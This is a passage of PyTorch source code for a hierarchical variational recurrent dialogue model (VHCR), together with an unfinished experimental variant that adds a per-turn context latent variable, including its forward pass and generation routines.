var_posterior = self.softplus(self.sent_posterior_var(h_posterior))
return mu_posterior, var_posterior
def forward(self, sentences, sentence_length,
input_conversation_length, target_sentences, decode=False):
"""
Args:
sentences: (Variable, LongTensor) [num_sentences + batch_size, seq_len]
target_sentences: (Variable, LongTensor) [num_sentences, seq_len]
Return:
decoder_outputs: (Variable, FloatTensor)
- train: [batch_size, seq_len, vocab_size]
- eval: [batch_size, seq_len]
"""
batch_size = input_conversation_length.size(0)
num_sentences = sentences.size(0) - batch_size
max_len = input_conversation_length.data.max().item()
# encoder_outputs: [num_sentences + batch_size, max_source_length, hidden_size]
# encoder_hidden: [num_layers * direction, num_sentences + batch_size, hidden_size]
encoder_outputs, encoder_hidden = self.encoder(sentences,
sentence_length)
# encoder_hidden: [num_sentences + batch_size, num_layers * direction * hidden_size]
encoder_hidden = encoder_hidden.transpose(
1, 0).contiguous().view(num_sentences + batch_size, -1)
# pad and pack encoder_hidden
start = torch.cumsum(torch.cat((to_var(input_conversation_length.data.new(1).zero_()),
input_conversation_length[:-1] + 1)), 0)
# encoder_hidden: [batch_size, max_len + 1, num_layers * direction * hidden_size]
encoder_hidden = torch.stack([pad(encoder_hidden.narrow(0, s, l + 1), max_len + 1)
for s, l in zip(start.data.tolist(),
input_conversation_length.data.tolist())], 0)
# encoder_hidden_inference: [batch_size, max_len, num_layers * direction * hidden_size]
encoder_hidden_inference = encoder_hidden[:, 1:, :]
encoder_hidden_inference_flat = torch.cat(
[encoder_hidden_inference[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
# encoder_hidden_input: [batch_size, max_len, num_layers * direction * hidden_size]
encoder_hidden_input = encoder_hidden[:, :-1, :]
# Standard Gaussian prior
conv_eps = to_var(torch.randn([batch_size, self.config.z_conv_size]))
conv_mu_prior, conv_var_prior = self.conv_prior()
if not decode:
if self.config.sentence_drop > 0.0:
indices = np.where(np.random.rand(max_len) < self.config.sentence_drop)[0]
if len(indices) > 0:
encoder_hidden_input[:, indices, :] = self.unk_sent
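                    # Utterance drop: replace randomly chosen sentence
                    # encodings with a learned unknown-sentence vector so the
                    # model must rely on the conversation latent z_conv.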
# context_inference_outputs: [batch_size, max_len, num_directions * context_size]
# context_inference_hidden: [num_layers * num_directions, batch_size, hidden_size]
context_inference_outputs, context_inference_hidden = self.context_inference(encoder_hidden,
input_conversation_length + 1)
# context_inference_hidden: [batch_size, num_layers * num_directions * hidden_size]
context_inference_hidden = context_inference_hidden.transpose(
1, 0).contiguous().view(batch_size, -1)
conv_mu_posterior, conv_var_posterior = self.conv_posterior(context_inference_hidden)
z_conv = conv_mu_posterior + torch.sqrt(conv_var_posterior) * conv_eps
log_q_zx_conv = normal_logpdf(z_conv, conv_mu_posterior, conv_var_posterior).sum()
log_p_z_conv = normal_logpdf(z_conv, conv_mu_prior, conv_var_prior).sum()
kl_div_conv = normal_kl_div(conv_mu_posterior, conv_var_posterior,
conv_mu_prior, conv_var_prior).sum()
context_init = self.z_conv2context(z_conv).view(
self.config.num_layers, batch_size, self.config.context_size)
z_conv_expand = z_conv.view(z_conv.size(0), 1, z_conv.size(
1)).expand(z_conv.size(0), max_len, z_conv.size(1))
context_outputs, context_last_hidden = self.context_encoder(
torch.cat([encoder_hidden_input, z_conv_expand], 2),
input_conversation_length,
hidden=context_init)
# flatten outputs
# context_outputs: [num_sentences, context_size]
context_outputs = torch.cat([context_outputs[i, :l, :]
for i, l in enumerate(input_conversation_length.data)])
z_conv_flat = torch.cat(
[z_conv_expand[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
sent_mu_prior, sent_var_prior = self.sent_prior(context_outputs, z_conv_flat)
eps = to_var(torch.randn((num_sentences, self.config.z_sent_size)))
sent_mu_posterior, sent_var_posterior = self.sent_posterior(
context_outputs, encoder_hidden_inference_flat, z_conv_flat)
z_sent = sent_mu_posterior + torch.sqrt(sent_var_posterior) * eps
log_q_zx_sent = normal_logpdf(z_sent, sent_mu_posterior, sent_var_posterior).sum()
log_p_z_sent = normal_logpdf(z_sent, sent_mu_prior, sent_var_prior).sum()
# kl_div: [num_sentences]
kl_div_sent = normal_kl_div(sent_mu_posterior, sent_var_posterior,
sent_mu_prior, sent_var_prior).sum()
kl_div = kl_div_conv + kl_div_sent
log_q_zx = log_q_zx_conv + log_q_zx_sent
log_p_z = log_p_z_conv + log_p_z_sent
else:
z_conv = conv_mu_prior + torch.sqrt(conv_var_prior) * conv_eps
context_init = self.z_conv2context(z_conv).view(
self.config.num_layers, batch_size, self.config.context_size)
z_conv_expand = z_conv.view(z_conv.size(0), 1, z_conv.size(
1)).expand(z_conv.size(0), max_len, z_conv.size(1))
# context_outputs: [batch_size, max_len, context_size]
context_outputs, context_last_hidden = self.context_encoder(
torch.cat([encoder_hidden_input, z_conv_expand], 2),
input_conversation_length,
hidden=context_init)
# flatten outputs
# context_outputs: [num_sentences, context_size]
context_outputs = torch.cat([context_outputs[i, :l, :]
for i, l in enumerate(input_conversation_length.data)])
z_conv_flat = torch.cat(
[z_conv_expand[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
sent_mu_prior, sent_var_prior = self.sent_prior(context_outputs, z_conv_flat)
eps = to_var(torch.randn((num_sentences, self.config.z_sent_size)))
z_sent = sent_mu_prior + torch.sqrt(sent_var_prior) * eps
kl_div = None
log_p_z = normal_logpdf(z_sent, sent_mu_prior, sent_var_prior).sum()
log_p_z += normal_logpdf(z_conv, conv_mu_prior, conv_var_prior).sum()
log_q_zx = None
# expand z_conv to all associated sentences
z_conv = torch.cat([z.view(1, -1).expand(m.item(), self.config.z_conv_size)
for z, m in zip(z_conv, input_conversation_length)])
# latent_context: [num_sentences, context_size + z_sent_size +
# z_conv_size]
latent_context = torch.cat([context_outputs, z_sent, z_conv], 1)
decoder_init = self.context2decoder(latent_context)
decoder_init = decoder_init.view(-1,
self.decoder.num_layers,
self.decoder.hidden_size)
decoder_init = decoder_init.transpose(1, 0).contiguous()
# train: [batch_size, seq_len, vocab_size]
# eval: [batch_size, seq_len]
if not decode:
decoder_outputs = self.decoder(target_sentences,
init_h=decoder_init,
decode=decode)
return decoder_outputs, kl_div, log_p_z, log_q_zx
else:
# prediction: [batch_size, beam_size, max_unroll]
prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
return prediction, kl_div, log_p_z, log_q_zx
def generate(self, context, sentence_length, n_context):
# context: [batch_size, n_context, seq_len]
batch_size = context.size(0)
# n_context = context.size(1)
samples = []
# Run for context
conv_eps = to_var(torch.randn([batch_size, self.config.z_conv_size]))
# conv_mu_prior, conv_var_prior = self.conv_prior()
# z_conv = conv_mu_prior + torch.sqrt(conv_var_prior) * conv_eps
encoder_hidden_list = []
for i in range(n_context):
# encoder_outputs: [batch_size, seq_len, hidden_size * direction]
# encoder_hidden: [num_layers * direction, batch_size, hidden_size]
encoder_outputs, encoder_hidden = self.encoder(context[:, i, :],
sentence_length[:, i])
# encoder_hidden: [batch_size, num_layers * direction * hidden_size]
encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(batch_size, -1)
encoder_hidden_list.append(encoder_hidden)
encoder_hidden = torch.stack(encoder_hidden_list, 1)
context_inference_outputs, context_inference_hidden = self.context_inference(encoder_hidden,
to_var(torch.LongTensor([n_context] * batch_size)))
context_inference_hidden = context_inference_hidden.transpose(
1, 0).contiguous().view(batch_size, -1)
conv_mu_posterior, conv_var_posterior = self.conv_posterior(context_inference_hidden)
z_conv = conv_mu_posterior + torch.sqrt(conv_var_posterior) * conv_eps
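        # At generation time z_conv is sampled from the posterior conditioned
        # on the observed context turns rather than from the standard prior.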
context_init = self.z_conv2context(z_conv).view(
self.config.num_layers, batch_size, self.config.context_size)
context_hidden = context_init
for i in range(n_context):
# encoder_outputs: [batch_size, seq_len, hidden_size * direction]
# encoder_hidden: [num_layers * direction, batch_size, hidden_size]
encoder_outputs, encoder_hidden = self.encoder(context[:, i, :],
sentence_length[:, i])
            # encoder_hidden: [batch_size, num_layers * direction * hidden_size]
encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(batch_size, -1)
encoder_hidden_list.append(encoder_hidden)
# context_outputs: [batch_size, 1, context_hidden_size * direction]
# context_hidden: [num_layers * direction, batch_size, context_hidden_size]
context_outputs, context_hidden = self.context_encoder.step(torch.cat([encoder_hidden, z_conv], 1),
context_hidden)
# Run for generation
for j in range(self.config.n_sample_step):
# context_outputs: [batch_size, context_hidden_size * direction]
context_outputs = context_outputs.squeeze(1)
mu_prior, var_prior = self.sent_prior(context_outputs, z_conv)
eps = to_var(torch.randn((batch_size, self.config.z_sent_size)))
z_sent = mu_prior + torch.sqrt(var_prior) * eps
latent_context = torch.cat([context_outputs, z_sent, z_conv], 1)
decoder_init = self.context2decoder(latent_context)
decoder_init = decoder_init.view(self.decoder.num_layers, -1, self.decoder.hidden_size)
if self.config.sample:
prediction = self.decoder(None, decoder_init, decode=True)
p = prediction.data.cpu().numpy()
length = torch.from_numpy(np.where(p == EOS_ID)[1])
else:
prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
# prediction: [batch_size, seq_len]
prediction = prediction[:, 0, :]
# length: [batch_size]
length = [l[0] for l in length]
length = to_var(torch.LongTensor(length))
samples.append(prediction)
encoder_outputs, encoder_hidden = self.encoder(prediction,
length)
encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(batch_size, -1)
context_outputs, context_hidden = self.context_encoder.step(torch.cat([encoder_hidden, z_conv], 1),
context_hidden)
samples = torch.stack(samples, 1)
return samples
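
# VHCR_new below is work in progress: it extends VHCR with an additional
# per-timestep context latent z_ctx alongside z_conv and z_sent.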
class VHCR_new(nn.Module):
def __init__(self, config):
        super(VHCR_new, self).__init__()
self.config = config
self.encoder = layers.EncoderRNN(config.vocab_size,
config.embedding_size,
config.encoder_hidden_size,
config.rnn,
config.num_layers,
config.bidirectional,
config.dropout)
context_input_size = (config.num_layers
* config.encoder_hidden_size
                              * self.encoder.num_directions + config.z_conv_size + config.z_ctx_size)  ## add z_ctx
self.context_encoder = layers.ContextRNN(context_input_size,
config.context_size,
config.rnn,
config.num_layers,
config.dropout)
        self.unk_sent = nn.Parameter(torch.randn(context_input_size - config.z_conv_size - config.z_ctx_size))  ## exclude the z_conv and z_ctx dimensions
self.z_conv2context = layers.FeedForward(config.z_conv_size,
config.num_layers * config.context_size,
num_layers=1,
activation=config.activation)
"""edit here"""
        self.context2context_first = layers.Context2Context(config.context_size * 2 + config.z_conv_size,
                                                            config.context_size)
        self.context2context = layers.Context2Context(config.context_size * 2
                                                      + config.z_conv_size + config.z_ctx_size,
                                                      config.context_size)
"""stop here"""
context_input_size = (config.num_layers
* config.encoder_hidden_size
* self.encoder.num_directions) ##infer z_conv
self.context_inference = layers.ContextRNN(context_input_size,
config.context_size,
config.rnn,
config.num_layers,
config.dropout,
bidirectional=True)
        # bidirectional=False here (unlike context_inference) so the hidden
        # size matches when inferring z_ctx
self.ctx_inference = layers.ContextRNN(context_input_size,
config.context_size,
config.rnn,
config.num_layers,
config.dropout)
self.decoder = layers.DecoderRNN(config.vocab_size,
config.embedding_size,
config.decoder_hidden_size,
config.rnncell,
config.num_layers,
config.dropout,
config.word_drop,
config.max_unroll,
config.sample,
config.temperature,
config.beam_size)
        self.context2decoder = layers.FeedForward(config.context_size + config.z_sent_size + config.z_conv_size + config.z_ctx_size,  ## add config.z_ctx_size
config.num_layers * config.decoder_hidden_size,
num_layers=1,
activation=config.activation)
self.softplus = nn.Softplus()
self.conv_posterior_h = layers.FeedForward(config.num_layers * self.context_inference.num_directions * config.context_size,
config.context_size,
num_layers=2,
hidden_size=config.context_size,
activation=config.activation)
self.conv_posterior_mu = nn.Linear(config.context_size,
config.z_conv_size)
self.conv_posterior_var = nn.Linear(config.context_size,
config.z_conv_size)
        # Should z_sent also condition on z_ctx? (It does below.)
        self.sent_prior_h = layers.FeedForward(config.context_size + config.z_conv_size + config.z_ctx_size,  # z_sent_prior(h_ctx, z_conv, z_ctx)
config.context_size,
num_layers=1,
hidden_size=config.z_sent_size,
activation=config.activation)
self.sent_prior_mu = nn.Linear(config.context_size,
config.z_sent_size)
self.sent_prior_var = nn.Linear(config.context_size,
config.z_sent_size)
        self.sent_posterior_h = layers.FeedForward(config.z_conv_size + config.z_ctx_size + config.encoder_hidden_size * self.encoder.num_directions * config.num_layers + config.context_size,
config.context_size, ##z_sen_posterior (h_ctx,z_conv,z_ctx,x_encode)
num_layers=2,
hidden_size=config.context_size,
activation=config.activation)
self.sent_posterior_mu = nn.Linear(config.context_size,
config.z_sent_size)
self.sent_posterior_var = nn.Linear(config.context_size,
config.z_sent_size)
##z_ctx_prior
        self.ctx_prior_h = layers.FeedForward(config.z_conv_size + config.context_size,
config.context_size,
num_layers=1,
hidden_size=config.context_size, ##use config.context_size or config.z_ctx_size?
activation=config.activation)
self.ctx_prior_mu = nn.Linear(config.context_size,
config.z_ctx_size)
self.ctx_prior_var = nn.Linear(config.context_size,
config.z_ctx_size)
##z_ctx_posterior
        self.ctx_posterior_h = layers.FeedForward(config.z_conv_size + config.context_size + config.num_layers * self.context_inference.num_directions * config.context_size,
config.context_size,
num_layers=2,
hidden_size=config.context_size,
activation=config.activation)
        ## The posterior for z_ctx should depend on x(<t), z_conv, and
        ## h_context(t), but the inference network above consumes all of x
        ## (just as for z_conv); restricting it to x(<t) is an open question.
self.ctx_posterior_mu = nn.Linear(config.context_size,
config.z_ctx_size)
self.ctx_posterior_var = nn.Linear(config.context_size,
config.z_ctx_size)
if config.tie_embedding:
self.decoder.embedding = self.encoder.embedding
def conv_prior(self):
# Standard gaussian prior
return to_var(torch.FloatTensor([0.0])), to_var(torch.FloatTensor([1.0]))
def conv_posterior(self, context_inference_hidden):
h_posterior = self.conv_posterior_h(context_inference_hidden)
mu_posterior = self.conv_posterior_mu(h_posterior)
var_posterior = self.softplus(self.conv_posterior_var(h_posterior))
return mu_posterior, var_posterior
    ## ctx_prior
    def ctx_prior(self, context_outputs, z_conv):
h_prior = self.ctx_prior_h(torch.cat([context_outputs, z_conv], dim=1))
mu_prior = self.ctx_prior_mu(h_prior)
var_prior = self.softplus(self.ctx_prior_var(h_prior))
return mu_prior, var_prior
    # ctx_posterior
    def ctx_posterior(self, ctx_inference_hidden, context_outputs, z_conv):
        h_posterior = self.ctx_posterior_h(torch.cat([context_outputs, ctx_inference_hidden, z_conv], 1))
        mu_posterior = self.ctx_posterior_mu(h_posterior)
        var_posterior = self.softplus(self.ctx_posterior_var(h_posterior))
        return mu_posterior, var_posterior
    # Do we need z_ctx in sent_prior and sent_posterior? (Added here.)
    def sent_prior(self, context_outputs, z_conv, z_ctx):
# Context dependent prior
h_prior = self.sent_prior_h(torch.cat([context_outputs, z_conv, z_ctx], dim=1))
mu_prior = self.sent_prior_mu(h_prior)
var_prior = self.softplus(self.sent_prior_var(h_prior))
return mu_prior, var_prior
    def sent_posterior(self, context_outputs, encoder_hidden, z_conv, z_ctx):
h_posterior = self.sent_posterior_h(torch.cat([context_outputs, encoder_hidden, z_conv, z_ctx], 1))
mu_posterior = self.sent_posterior_mu(h_posterior)
var_posterior = self.softplus(self.sent_posterior_var(h_posterior))
return mu_posterior, var_posterior
def forward(self, sentences, sentence_length,
input_conversation_length, target_sentences, decode=False):
"""
Args:
sentences: (Variable, LongTensor) [num_sentences + batch_size, seq_len]
target_sentences: (Variable, LongTensor) [num_sentences, seq_len]
Return:
decoder_outputs: (Variable, FloatTensor)
- train: [batch_size, seq_len, vocab_size]
- eval: [batch_size, seq_len]
"""
        # num_sentences = sentences.size(0) - batch_size: the number of input sentences
batch_size = input_conversation_length.size(0)
num_sentences = sentences.size(0) - batch_size
max_len = input_conversation_length.data.max().item()
# encoder_outputs: [num_sentences + batch_size, max_source_length, hidden_size]
# encoder_hidden: [num_layers * direction, num_sentences + batch_size, hidden_size]
encoder_outputs, encoder_hidden = self.encoder(sentences,
sentence_length)
# encoder_hidden: [num_sentences + batch_size, num_layers * direction * hidden_size]
encoder_hidden = encoder_hidden.transpose(
1, 0).contiguous().view(num_sentences + batch_size, -1)
# pad and pack encoder_hidden
start = torch.cumsum(torch.cat((to_var(input_conversation_length.data.new(1).zero_()),
input_conversation_length[:-1] + 1)), 0)
# encoder_hidden: [batch_size, max_len + 1, num_layers * direction * hidden_size]
encoder_hidden = torch.stack([pad(encoder_hidden.narrow(0, s, l + 1), max_len + 1)
for s, l in zip(start.data.tolist(),
input_conversation_length.data.tolist())], 0)
# encoder_hidden_inference: [batch_size, max_len, num_layers * direction * hidden_size]
encoder_hidden_inference = encoder_hidden[:, 1:, :]
encoder_hidden_inference_flat = torch.cat(
[encoder_hidden_inference[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
# encoder_hidden_input: [batch_size, max_len, num_layers * direction * hidden_size]
encoder_hidden_input = encoder_hidden[:, :-1, :]
# Standard Gaussian prior
conv_eps = to_var(torch.randn([batch_size, self.config.z_conv_size]))
conv_mu_prior, conv_var_prior = self.conv_prior()
if not decode:
if self.config.sentence_drop > 0.0:
indices = np.where(np.random.rand(max_len) < self.config.sentence_drop)[0]
if len(indices) > 0:
encoder_hidden_input[:, indices, :] = self.unk_sent
# context_inference_outputs: [batch_size, max_len, num_directions * context_size]
# context_inference_hidden: [num_layers * num_directions, batch_size, hidden_size]
context_inference_outputs, context_inference_hidden = self.context_inference(encoder_hidden,
input_conversation_length + 1)
# context_inference_hidden: [batch_size, num_layers * num_directions * hidden_size]
context_inference_hidden = context_inference_hidden.transpose(
1, 0).contiguous().view(batch_size, -1)
conv_mu_posterior, conv_var_posterior = self.conv_posterior(context_inference_hidden)
z_conv = conv_mu_posterior + torch.sqrt(conv_var_posterior) * conv_eps
log_q_zx_conv = normal_logpdf(z_conv, conv_mu_posterior, conv_var_posterior).sum()
log_p_z_conv = normal_logpdf(z_conv, conv_mu_prior, conv_var_prior).sum()
kl_div_conv = normal_kl_div(conv_mu_posterior, conv_var_posterior,
conv_mu_prior, conv_var_prior).sum()
context_init = self.z_conv2context(z_conv).view(
self.config.num_layers, batch_size, self.config.context_size)
            # Expand z_conv to [batch_size, max_len, z_conv_size] so every
            # sentence can condition on it
z_conv_expand = z_conv.view(z_conv.size(0), 1, z_conv.size(
1)).expand(z_conv.size(0), max_len, z_conv.size(1))
"""code for context"""
context_outputs = []
z_ctx = []
ctx_mu_prior = []
ctx_var_prior = []
ctx_mu_posterior = []
ctx_var_posterior = []
ctx_eps = to_var(torch.randn((batch_size, self.config.z_ctx_size)))
# context_inference_outputs: [batch_size, max_len, num_directions * context_size]
# context_inference_hidden: [num_layers * num_directions, batch_size, hidden_size]
ctx_inference_outputs, ctx_inference_hidden = self.context_inference(encoder_hidden,
input_conversation_length + 1)
context_init1 = context_init.squeeze(0)
            for i_ctx in range(max_len):
                if i_ctx == 0:
                    context_cell_input = torch.cat([encoder_hidden_input[:, i_ctx, :], z_conv_expand[:, i_ctx, :]], 1)
                    context_h_cell = self.context2context_first(
                        context_cell_input,
                        hidden=context_init1)
                else:
                    context_cell_input = torch.cat([encoder_hidden_input[:, i_ctx, :], z_conv_expand[:, i_ctx, :], z_ctx_cell], 1)
                    context_h_cell = self.context2context(
                        context_cell_input,
                        hidden=context_h_cell)
                # z_ctx_cell: [batch_size, num_directions * context_size]
                ctx_cell_mu_prior, ctx_cell_var_prior = self.ctx_prior(context_h_cell, z_conv_expand[:, i_ctx, :])
                ctx_cell_mu_posterior, ctx_cell_var_posterior = self.ctx_posterior(ctx_inference_outputs[:, i_ctx, :], context_h_cell, z_conv_expand[:, i_ctx, :])
                z_ctx_cell = ctx_cell_mu_posterior + torch.sqrt(ctx_cell_var_posterior) * ctx_eps
                z_ctx.append(z_ctx_cell)
                ctx_mu_prior.append(ctx_cell_mu_prior)
                ctx_var_prior.append(ctx_cell_var_prior)
                ctx_mu_posterior.append(ctx_cell_mu_posterior)
                ctx_var_posterior.append(ctx_cell_var_posterior)
                context_outputs.append(context_h_cell)
# context_outputs: [batch_size, max_len, context_size]
# z_ctx: [batch_size, max_len, z_ctx_size]
context_outputs = torch.stack(context_outputs, 1)
ctx_mu_prior = torch.stack(ctx_mu_prior, 1)
ctx_var_prior = torch.stack(ctx_var_prior, 1)
ctx_mu_posterior = torch.stack(ctx_mu_posterior, 1)
ctx_var_posterior = torch.stack(ctx_var_posterior, 1)
z_ctx = torch.stack(z_ctx, 1)
"""stop here"""
# flatten outputs
# context_outputs: [num_sentences, context_size]
context_outputs = torch.cat([context_outputs[i, :l, :]
for i, l in enumerate(input_conversation_length.data)])
z_conv_flat = torch.cat(
[z_conv_expand[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
# Flatten z_ctx and its posterior/prior mu and var over the valid sentences
z_ctx_flat = torch.cat(
[z_ctx[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
ctx_mu_posterior_flat = torch.cat(
[ctx_mu_posterior[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
ctx_var_posterior_flat = torch.cat(
[ctx_var_posterior[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
ctx_mu_prior_flat = torch.cat(
[ctx_mu_prior[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
ctx_var_prior_flat = torch.cat(
[ctx_var_prior[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
log_q_zx_ctx = normal_logpdf(z_ctx_flat, ctx_mu_posterior_flat, ctx_var_posterior_flat).sum()
log_p_z_ctx = normal_logpdf(z_ctx_flat, ctx_mu_prior_flat, ctx_var_prior_flat).sum()
kl_div_ctx = normal_kl_div(ctx_mu_posterior_flat, ctx_var_posterior_flat,
ctx_mu_prior_flat, ctx_var_prior_flat).sum()
"""stop here"""
sent_mu_prior, sent_var_prior = self.sent_prior(context_outputs, z_conv_flat, z_ctx_flat)
eps = to_var(torch.randn((num_sentences, self.config.z_sent_size)))
sent_mu_posterior, sent_var_posterior = self.sent_posterior(
context_outputs, encoder_hidden_inference_flat, z_conv_flat, z_ctx_flat)
z_sent = sent_mu_posterior + torch.sqrt(sent_var_posterior) * eps
log_q_zx_sent = normal_logpdf(z_sent, sent_mu_posterior, sent_var_posterior).sum()
log_p_z_sent = normal_logpdf(z_sent, sent_mu_prior, sent_var_prior).sum()
# kl_div: [num_sentences]
kl_div_sent = normal_kl_div(sent_mu_posterior, sent_var_posterior,
sent_mu_prior, sent_var_prior).sum()
kl_div = kl_div_conv + kl_div_sent + kl_div_ctx
log_q_zx = log_q_zx_conv + log_q_zx_sent + log_q_zx_ctx
log_p_z = log_p_z_conv + log_p_z_sent + log_p_z_ctx
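# The three KL terms (conversation, per-step context, sentence) are what the
# training loop is expected to combine with the decoder's reconstruction
# loss to form the ELBO.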
else:
z_conv = conv_mu_prior + torch.sqrt(conv_var_prior) * conv_eps
context_init = self.z_conv2context(z_conv).view(
self.config.num_layers, batch_size, self.config.context_size)
z_conv_expand = z_conv.view(z_conv.size(0), 1, z_conv.size(
1)).expand(z_conv.size(0), max_len, z_conv.size(1))
# context_outputs: [batch_size, max_len, context_size]
"""code for context how to dropout? need dropout?"""
context_outputs = []
z_ctx = []
ctx_mu_prior = []
ctx_var_prior = []
ctx_eps = to_var(torch.randn((batch_size, self.config.z_ctx_size)))
# context_inference_outputs: [batch_size, max_len, num_directions * context_size]
# context_inference_hidden: [num_layers * num_directions, batch_size, hidden_size]
ctx_inference_outputs, ctx_inference_hidden = self.context_inference(encoder_hidden,
input_conversation_length + 1)
context_init1 = context_init.squeeze(0)
for i_ctx in range(max_len):
if i_ctx == 0:
context_cell_input = torch.cat([encoder_hidden_input[:, i_ctx, :], z_conv_expand[:, i_ctx, :]], 1)
context_h_cell = self.context2context_first(
context_cell_input,
hidden=context_init1)
else:
context_cell_input = torch.cat([encoder_hidden_input[:, i_ctx, :], z_conv_expand[:, i_ctx, :], z_ctx_cell], 1)
context_h_cell = self.context2context(
context_cell_input,
hidden=context_h_cell)
# z_ctx_cell: [batch_size, num_directions * context_size]
ctx_cell_mu_prior, ctx_cell_var_prior = self.ctx_prior(context_h_cell, z_conv_expand[:, i_ctx, :])
z_ctx_cell = ctx_cell_mu_prior + torch.sqrt(ctx_cell_var_prior) * ctx_eps
z_ctx.append(z_ctx_cell)
ctx_mu_prior.append(ctx_cell_mu_prior)
ctx_var_prior.append(ctx_cell_var_prior)
context_outputs.append(context_h_cell)
# context_outputs: [batch_size, max_len, context_size]
# z_ctx: [batch_size, max_len, z_ctx_size]
context_outputs = torch.stack(context_outputs, 1)
ctx_mu_prior = torch.stack(ctx_mu_prior, 1)
ctx_var_prior = torch.stack(ctx_var_prior, 1)
z_ctx = torch.stack(z_ctx, 1)
"""stop here"""
# flatten outputs
# context_outputs: [num_sentences, context_size]
context_outputs = torch.cat([context_outputs[i, :l, :]
for i, l in enumerate(input_conversation_length.data)])
z_conv_flat = torch.cat(
[z_conv_expand[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
"""code edit here"""
z_ctx_flat = torch.cat(
[z_ctx[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
ctx_mu_prior_flat = torch.cat(
[ctx_mu_prior[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
ctx_var_prior_flat = torch.cat(
[ctx_var_prior[i, :l, :] for i, l in enumerate(input_conversation_length.data)])
"""stop here"""
sent_mu_prior, sent_var_prior = self.sent_prior(context_outputs, z_conv_flat, z_ctx_flat)
eps = to_var(torch.randn((num_sentences, self.config.z_sent_size)))
z_sent = sent_mu_prior + torch.sqrt(sent_var_prior) * eps
kl_div = None
log_p_z = normal_logpdf(z_sent, sent_mu_prior, sent_var_prior).sum()
log_p_z += normal_logpdf(z_conv_flat, conv_mu_prior, conv_var_prior).sum()
log_p_z += normal_logpdf(z_ctx_flat, ctx_mu_prior_flat, ctx_var_prior_flat).sum()
log_q_zx = None
# expand z_conv to all associated sentences
#expand z_ctx
# z_ctx = torch.cat([z.view(1, -1).expand(m.item(), self.config.z_ctx_size)
# for z, m in zip(z_ctx, input_conversation_length)])
z_conv = torch.cat([z.view(1, -1).expand(m.item(), self.config.z_conv_size)
for z, m in zip(z_conv, input_conversation_length)])
# latent_context: [num_sentences, context_size + z_sent_size +
# z_conv_size + z_ctx_size]
latent_context = torch.cat([context_outputs, z_sent, z_conv, z_ctx_flat], 1)
decoder_init = self.context2decoder(latent_context)
decoder_init = decoder_init.view(-1,
self.decoder.num_layers,
self.decoder.hidden_size)
decoder_init = decoder_init.transpose(1, 0).contiguous()
#decoder_init: [num_layers,batch_size,hidden_size]
# train: [batch_size, seq_len, vocab_size]
# eval: [batch_size, seq_len]
"""edit here"""
if not decode:
decoder_outputs = self.decoder(target_sentences,
init_h=decoder_init,
decode=decode)
# decoder_outputs: [batch_size, max_target_len, vocab_size]
return decoder_outputs, kl_div, log_p_z, log_q_zx
else:
# prediction: [batch_size, beam_size, max_unroll]
prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
return prediction, kl_div, log_p_z, log_q_zx
def generate(self, context, sentence_length, n_context):
# context: [batch_size, n_context, seq_len]
batch_size = context.size(0)
# n_context = context.size(1)
samples = []
# Run for context
conv_eps = to_var(torch.randn([batch_size, self.config.z_conv_size]))
# conv_mu_prior, conv_var_prior = self.conv_prior()
# z_conv = conv_mu_prior + torch.sqrt(conv_var_prior) * conv_eps
encoder_hidden_list = []
for i in range(n_context):
# encoder_outputs: [batch_size, seq_len, hidden_size * direction]
# encoder_hidden: [num_layers * direction, batch_size, hidden_size]
"""encoder use nn.GRU which need a 3 dimension input context[:, i, :] ? two dimension right? """
encoder_outputs, encoder_hidden = self.encoder(context[:, i, :],
sentence_length[:, i])
# encoder_hidden: [batch_size, num_layers * direction * hidden_size]
encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(batch_size, -1)
encoder_hidden_list.append(encoder_hidden)
# encoder_hidden: [batch_size, n_context, num_layers * direction * hidden_size]
encoder_hidden = torch.stack(encoder_hidden_list, 1)
context_inference_outputs, context_inference_hidden = self.context_inference(encoder_hidden,
to_var(torch.LongTensor([n_context] * batch_size)))
context_inference_hidden = context_inference_hidden.transpose(
1, 0).contiguous().view(batch_size, -1)
conv_mu_posterior, conv_var_posterior = self.conv_posterior(context_inference_hidden)
z_conv = conv_mu_posterior + torch.sqrt(conv_var_posterior) * conv_eps
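# Note: generation conditions z_conv on the observed context through the
# posterior network; the prior-sampling path is left commented out above.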
context_init = self.z_conv2context(z_conv).view(
self.config.num_layers, batch_size, self.config.context_size)
#context_hidden = context_init
"""edit here"""
z_conv_expand = z_conv.view(z_conv.size(0), 1, z_conv.size(
1)).expand(z_conv.size(0), n_context, z_conv.size(1))
# context_outputs = []
# z_ctx = []
# ctx_mu_prior = []
# ctx_var_prior = []
# ctx_mu_posterior = []
# ctx_var_posterior = []
ctx_eps = to_var(torch.randn((batch_size, self.config.z_ctx_size)))
# context_inference_outputs: [batch_size, max_len, num_directions * context_size]
# context_inference_hidden: [num_layers * num_directions, batch_size, hidden_size]
ctx_inference_outputs, ctx_inference_hidden = self.context_inference(encoder_hidden,
to_var(torch.LongTensor([n_context] * batch_size)))
context_init1 = context_init.squeeze(0)
for i_ctx in range(n_context):
if i_ctx == 0:
context_cell_input = torch.cat([encoder_hidden[:, i_ctx, :], z_conv_expand[:, i_ctx, :]], 1)
context_h_cell = self.context2context_first(
context_cell_input,
hidden=context_init1)
else:
context_cell_input = torch.cat([encoder_hidden[:, i_ctx, :], z_conv_expand[:, i_ctx, :], z_ctx_cell], 1)
context_h_cell = self.context2context(
context_cell_input,
hidden=context_h_cell)
# z_ctx_cell: [batch_size, num_directions * context_size]
# ctx_cell_mu_prior, ctx_cell_var_prior = self.ctx_prior(context_h_cell, z_conv_expand[:, i_ctx, :])
